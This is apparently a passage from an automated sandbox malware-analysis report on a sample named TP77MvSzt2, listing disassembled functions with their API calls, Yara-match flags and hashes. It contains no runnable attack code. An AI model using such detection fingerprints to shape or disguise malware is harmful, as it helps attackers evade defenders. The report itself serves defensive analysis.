                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0483C446
                                                                                  • std::_Facet_Register.LIBCPMT ref: 0483C477
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0483C48D
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0483C4AB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                  • Instruction ID: d9fcd411b0fb2e581c79a5aade78b39714f40836363b833ee890de06d5be5f23
                                                                                  • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                  • Instruction Fuzzy Hash: 2C11C2729002289BDB11FBA8C800AFD7760AF4031AF140E19E911FB2D0DBB4BA04CBD2
                                                                                  Function 04834EA0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 04834EB1
                                                                                  • int.LIBCPMT ref: 04834EC8
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 0483BFF9
                                                                                    • Part of subcall function 0483BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 0483C013
                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 04834ED1
                                                                                  • std::_Facet_Register.LIBCPMT ref: 04834F02
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 04834F18
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04834F36
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                  • String ID:
                                                                                  • API String ID: 2243866535-0
                                                                                  • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                  • Instruction ID: d5d3e0f0fd16fdf1725e894677aee2792e2449838a7b6c8e8d789295982a4cb2
                                                                                  • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                  • Instruction Fuzzy Hash: 231182729002189BDB15FB68C844AFD7774AF4071AF140E19E911E72E0DBB4BA44C7D2
                                                                                  Function 04858957 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0485898A
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 04858A43
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: 11@$@fB$csm
                                                                                  • API String ID: 3480331319-1464837749
                                                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                  • Instruction ID: 23ba419fe2fcf06c50f3d227d06bcd0e1e7e8a1be16c8f2907efab5315dc388c
                                                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                  • Instruction Fuzzy Hash: 8141D834A00209EBCF11EF28C8809AE7BA5AF45318F148756DC15DB3A1D771BA65CB92
                                                                                  Function 0042370F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,00000000), ref: 00423759
                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423741
                                                                                    • Part of subcall function 0041B74C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B76D
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0042378A
                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2630251706-1785270423
                                                                                  • Opcode ID: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                                                  • Instruction ID: 33ce48ef146ac78a3ef221314cc781bfd8a3c25b4f9a6e194e2960aa52b33145
                                                                                  • Opcode Fuzzy Hash: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                                                  • Instruction Fuzzy Hash: 9C110B757002106BCF047F65DC85DAE7765EF84772B10416BFA05D7292CFAC9E41CA98
                                                                                  Function 0041CE2D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE41
                                                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE65
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE78
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE86
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                  • String ID: pScheduler
                                                                                  • API String ID: 3657713681-923244539
                                                                                  • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                  • Instruction ID: 46b9ecfe0875f7f86596c353a9bffc422044863c42dab0ab2bac390bf5a45ba1
                                                                                  • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                  • Instruction Fuzzy Hash: 8FF0593594070863C324EB15DC828DEB3799E91728360812FE40563182CF3CAE8AC69D
                                                                                  Function 0041E63D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E65F
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E672
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E680
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                  • String ID: 11@$pContext
                                                                                  • API String ID: 1990795212-1086721755
                                                                                  • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                  • Instruction ID: 1f218d0b40ab772f1aed9042d58143e35ca4ab3a9892fa22be9c34d269449320
                                                                                  • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                  • Instruction Fuzzy Hash: 45E06139B0011457CB04FB66DC06C5DB7A8AEC0B14750006FF901A3342DFB8A90585C8
                                                                                  Function 00411EB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::critical_section::unlock.LIBCMT ref: 00411EBC
                                                                                    • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411153
                                                                                    • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041118A
                                                                                    • Part of subcall function 00411132: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411196
                                                                                  • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EC8
                                                                                    • Part of subcall function 00410AA3: Concurrency::critical_section::unlock.LIBCMT ref: 00410AC7
                                                                                  • Concurrency::Context::Block.LIBCONCRT ref: 00411ECD
                                                                                    • Part of subcall function 00412C81: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C83
                                                                                  • Concurrency::critical_section::lock.LIBCONCRT ref: 00411EED
                                                                                    • Part of subcall function 0041105B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411069
                                                                                    • Part of subcall function 0041105B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411076
                                                                                    • Part of subcall function 0041105B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411081
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                  • String ID: 11@
                                                                                  • API String ID: 3659872527-1785270423
                                                                                  • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                  • Instruction ID: 5f19519383477fd90e693e8c592c5b4d2a982a5ecb934fba7b69a42e3a353b75
                                                                                  • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                  • Instruction Fuzzy Hash: E8E0D8355005029BCB04FF21C5614DCFB617F44354B10825EE466432E1CF785D86CB88
                                                                                  Function 0484211F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::critical_section::unlock.LIBCMT ref: 04842123
                                                                                    • Part of subcall function 04841399: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 048413BA
                                                                                    • Part of subcall function 04841399: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 048413F1
                                                                                    • Part of subcall function 04841399: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 048413FD
                                                                                  • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0484212F
                                                                                    • Part of subcall function 04840D0A: Concurrency::critical_section::unlock.LIBCMT ref: 04840D2E
                                                                                  • Concurrency::Context::Block.LIBCONCRT ref: 04842134
                                                                                    • Part of subcall function 04842EE8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 04842EEA
                                                                                  • Concurrency::critical_section::lock.LIBCONCRT ref: 04842154
                                                                                    • Part of subcall function 048412C2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 048412D0
                                                                                    • Part of subcall function 048412C2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 048412DD
                                                                                    • Part of subcall function 048412C2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 048412E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                  • String ID: 11@
                                                                                  • API String ID: 3659872527-1785270423
                                                                                  • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                  • Instruction ID: c34fa85d1f93440978301ef72fed453065f751f3404992a4c813073932f229f0
                                                                                  • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                  • Instruction Fuzzy Hash: DCE0DF3460011E9BEB08FB28C85816CBBA1BFC1318B104B4594A5C72A0CFB87E4ACB86
                                                                                  Function 0042B126 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                                                  • Instruction ID: 7eacffcc392e6897453e427a1bc5d3d4951d53cce7b4b374ddd0667b65be5727
                                                                                  • Opcode Fuzzy Hash: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                                                  • Instruction Fuzzy Hash: FF718E31B00266DBCB21CF95E884ABFBB75EF45360FA8426BE81057280D7789D41C7E9
                                                                                  Function 0485B38D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                  • Instruction ID: 6ca74aaf654108f6d027d1884e538a62a7a8ed270e4886eb3dd33355f044ffd4
                                                                                  • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                  • Instruction Fuzzy Hash: 7871E571A0021A9BCB398FA8C884ABFBB75FF61354F144B69ED11D71A0DB70B941C7A0
                                                                                  Function 00430A64 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                  • _free.LIBCMT ref: 00430B6F
                                                                                  • _free.LIBCMT ref: 00430B86
                                                                                  • _free.LIBCMT ref: 00430BA5
                                                                                  • _free.LIBCMT ref: 00430BC0
                                                                                  • _free.LIBCMT ref: 00430BD7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3033488037-0
                                                                                  • Opcode ID: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                                                  • Instruction ID: b3708cb7fd5f7c05c7b70e76ebc142bc523ed94c66de99b1f2255d1376b2cc69
                                                                                  • Opcode Fuzzy Hash: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                                                  • Instruction Fuzzy Hash: BD51DF31A00304ABDB21DF6AC851A6BB7F4EF58724F14566EE809DB250E739A901CB48
                                                                                  Function 04860CCB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3033488037-0
                                                                                  • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                  • Instruction ID: b568c157a0b95bd743adb359bcb5da5d369e8ea2433296587829a8a8ce9f814a
                                                                                  • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                  • Instruction Fuzzy Hash: 4A51D371A00704AFEB61DF29C881A6AB7F5EF4A724F140B6DE90AD7250E771F901CB85
                                                                                  Function 004314FB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                  • Instruction ID: 2269d71fc1307fb615fcd26a16e66de3d258f5a42cea17c2f792775dd2d74ff0
                                                                                  • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                  • Instruction Fuzzy Hash: E541C432E00204AFCB10DF78C981A5AB7B5EF89714F15456EE516EB391DB35ED02CB84
                                                                                  Function 04861762 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                  • Instruction ID: 96802d13798ee75a6c767599f79be7c93c6980faf81113a03fc21337c2ed713c
                                                                                  • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                  • Instruction Fuzzy Hash: C441D136A003049FDB50DF78C884A6EB3F5EF85718F154A69DA16EB382DB31B901DB81
                                                                                  Function 004368BD Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D11A,00000000,00000000,0042D958,?,0042D958,?,00000001,0042D11A,23E85006,00000001,0042D958,0042D958), ref: 0043690A
                                                                                  • __alloca_probe_16.LIBCMT ref: 00436942
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436993
                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004369A5
                                                                                  • __freea.LIBCMT ref: 004369AE
                                                                                    • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                  • String ID:
                                                                                  • API String ID: 313313983-0
                                                                                  • Opcode ID: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                                                  • Instruction ID: 564015b8663966f91a736df8c1f199cffa5732d11cc50b43fea489f3b547491b
                                                                                  • Opcode Fuzzy Hash: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                                                  • Instruction Fuzzy Hash: 0A31CE72A0020AAFDF249F65CC41EAF7BA5EF44714F16422AFC04D6290EB39CD54CB98
                                                                                  Function 0041AEE6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _SpinWait.LIBCONCRT ref: 0041AF0B
                                                                                    • Part of subcall function 00410F41: _SpinWait.LIBCONCRT ref: 00410F59
                                                                                  • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF1F
                                                                                  • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF51
                                                                                  • List.LIBCMT ref: 0041AFD4
                                                                                  • List.LIBCMT ref: 0041AFE3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                  • String ID:
                                                                                  • API String ID: 3281396844-0
                                                                                  • Opcode ID: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                                                  • Instruction ID: 96d9cd947b213099fbcac924e0358b3b7b3cf073485a4601a3d8c747dc036099
                                                                                  • Opcode Fuzzy Hash: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                                                  • Instruction Fuzzy Hash: 8C318971D02656DFCB14EFA5C5816EEBBB1BF04308F04006FE80167292DB786DA5CB9A
                                                                                  Function 00402054 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402086
                                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 0040208E
                                                                                  • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 004020A9
                                                                                  • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020D3
                                                                                  • GdiplusShutdown.GDIPLUS(?), ref: 004020FF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                  • String ID:
                                                                                  • API String ID: 2357751836-0
                                                                                  • Opcode ID: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                                                  • Instruction ID: c4f18e326f444715a52338ef43c677910c1406114480214147ef42e81c070973
                                                                                  • Opcode Fuzzy Hash: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                                                  • Instruction Fuzzy Hash: 4D2151B5A0031AAFDB10DFA5DD499AFFBB9FF48741B104036E906E3290D7759901CBA8
                                                                                  Function 048350EB Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 048350C8
                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 048350DC
                                                                                    • Part of subcall function 0483BDD3: __EH_prolog3_GS.LIBCMT ref: 0483BDDA
                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 04835141
                                                                                  • __Getcoll.LIBCPMT ref: 04835150
                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 04835160
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                                                  • String ID:
                                                                                  • API String ID: 1844465188-0
                                                                                  • Opcode ID: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                                                  • Instruction ID: b45da6df9a846c60e66768492306784adb85fb5dd8211cabf78bb8cd12ddc069
                                                                                  • Opcode Fuzzy Hash: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                                                  • Instruction Fuzzy Hash: 74213D72814208EFEB11EFA8C4447DDB7B0BF4471AF508A19D485EB181DBB8AA44CBD2
                                                                                  Function 00431F7E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                                                  • _free.LIBCMT ref: 00431FB8
                                                                                  • _free.LIBCMT ref: 00431FDF
                                                                                  • SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                                                  • SetLastError.KERNEL32(00000000), ref: 00431FF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                  • Instruction ID: 1e3cd072d0496c43a3242b2b2daca3b64790c0c87830b362050c04c7c8c4abe4
                                                                                  • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                  • Instruction Fuzzy Hash: 2101F936149A007BD61227255C45D6B262DABD977AF20212FF815933E2EFAD8906412D
                                                                                  Function 048621E5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(0483DAFC,0483DAFC,00000002,0485ED55,04863971,00000000,?,04856A25,00000002,00000000,00000000,00000000,?,0483CFAD,0483DAFC,00000004), ref: 048621EA
                                                                                  • _free.LIBCMT ref: 0486221F
                                                                                  • _free.LIBCMT ref: 04862246
                                                                                  • SetLastError.KERNEL32(00000000,?,0483DAFC), ref: 04862253
